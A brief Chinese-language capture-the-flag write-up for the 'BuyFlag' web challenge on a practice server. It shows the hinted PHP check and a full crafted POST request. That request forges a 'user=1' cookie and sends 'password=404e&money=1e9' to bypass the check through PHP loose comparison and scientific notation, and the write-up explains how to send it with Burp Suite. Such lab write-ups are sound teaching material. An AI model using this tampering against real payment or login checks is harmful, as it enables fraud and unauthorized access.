[極客大挑戰 2019]BuyFlag

[極客大挑戰 2019]BuyFlag

原始碼的提示

<!--
	~~~post money and password~~~
if (isset($_POST['password'])) {
	$password = $_POST['password'];
	if (is_numeric($password)) {
		echo "password can't be number</br>";
	}elseif ($password == 404) {
		echo "Password Right!</br>";
	}
}
-->

直接貼包

POST /pay.php HTTP/1.1
Host: a12f4602-ae29-4d03-8446-117a204e1ed1.node5.buuoj.cn:81
Proxy-Connection: keep-alive
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://a12f4602-ae29-4d03-8446-117a204e1ed1.node5.buuoj.cn:81/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: user=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
Upgrade-Insecure-Requests: 1
Priority: u=0, i

password=404e&money=1e9

上面的404e是首先讓他變成字串，且因為是弱比較，所以等式也滿足了，然後1e9是科學計數法的1000000000

要注意burpsuite來post的的時候

要改成POST /pay.php...

然後加一個Content-Type: application/x-www-form-urlencoded

再加入要傳入的資料